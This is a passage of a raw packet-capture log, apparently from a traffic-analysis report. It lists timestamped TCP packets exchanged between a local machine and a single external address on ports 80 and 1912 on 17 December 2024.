                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.940993071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.941009998 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.941065073 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.941102028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.941107988 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.984610081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.984776974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.984951973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.985085011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.985219002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.985551119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.985821009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.985919952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.986054897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.986766100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.986890078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.986984015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.987713099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.987839937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.987910986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.988493919 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.988749981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.988898993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.988976002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.989615917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.989727020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.989845991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.990607023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.990736961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.990912914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.991556883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.991694927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.991950989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.992536068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.992846012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.993119001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.993441105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.993609905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.993680954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.994467020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.994602919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.994822979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.995409012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.995508909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.995585918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.996350050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.996406078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.996521950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.997243881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.997356892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.997407913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.998246908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.998370886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.998554945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.999411106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.999463081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.999533892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.000144005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.000302076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.000472069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.001033068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.001154900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.001214981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.002003908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.002191067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.002360106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.002991915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.003108978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.003175020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.003959894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.004050016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.004128933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.004852057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.004976988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.005075932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.005834103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.005898952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.005999088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.006778002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.006927013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.007011890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.007757902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.007879019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.008312941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.008688927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.008769035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.008861065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.009598017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.009756088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.009880066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.010550976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.010601997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.010663986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.011555910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.011682034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.011748075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.012527943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.012609005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.012692928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.013555050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.013607979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.013736010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.014421940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.014575005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.014652014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.015378952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.015471935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.015542030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.016328096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.016422033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.016707897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.017257929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.017431974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.017959118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.018312931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.018367052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.018429041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.019185066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.019558907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.019619942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.020114899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.020222902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.020277023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.021071911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.021179914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.021261930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.022034883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.022097111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.022207022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.022950888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.023092985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.023220062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.023997068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.024168968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.024281025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.024867058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.024951935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.025002003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.025795937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.025938034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.026055098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.026763916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.026937008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.027074099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.027776957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.027878046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.027935982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.028691053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.028809071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.029062033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.029597044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.029736042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.029823065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.030559063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.030680895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.030791044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.031555891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.031656981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.031822920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.032475948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.032584906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.032887936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.033417940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.033529043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.033915997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.034475088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.082340002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.125807047 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177150011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177287102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177385092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177642107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177691936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.177903891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.178626060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.178809881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.178872108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.178917885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.180162907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.180197001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.180278063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.180818081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.180958033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.181000948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.181813002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.181847095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.181858063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.182590008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.182626963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.182663918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.183573008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.183643103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.183746099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.184571981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.184606075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.184623957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.185319901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.185468912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.185621023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.186467886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.186512947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.186609983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.187483072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.187602043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.187653065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.188349962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.188383102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.188585997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.189352989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.189385891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.189419985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.190305948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.190339088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.190366030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.191052914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.191118956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.191214085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.192245007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.192279100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.192301989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.193057060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.193140984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.193221092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.193953037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.194108963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.194259882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.195099115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.195183039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.195230961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.196003914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.196054935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.196310997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.197086096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.197185993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.197235107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198002100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198036909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198056936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198812008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198873997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.198965073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.199840069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.199876070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.199935913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.200596094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.200659990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.200700045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.201510906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.201638937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.201654911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.202471972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.202533960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.202615976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.203438044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.203562975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.203584909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.204431057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.204540014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.204572916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207561016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207672119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207684994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207736015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207768917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207784891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207803011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207838058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.207904100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.208323956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.208467007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.208511114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.209350109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.209446907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.209685087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.210350990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.210442066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.210463047 CET8049709185.81.68.147192.168.2.8
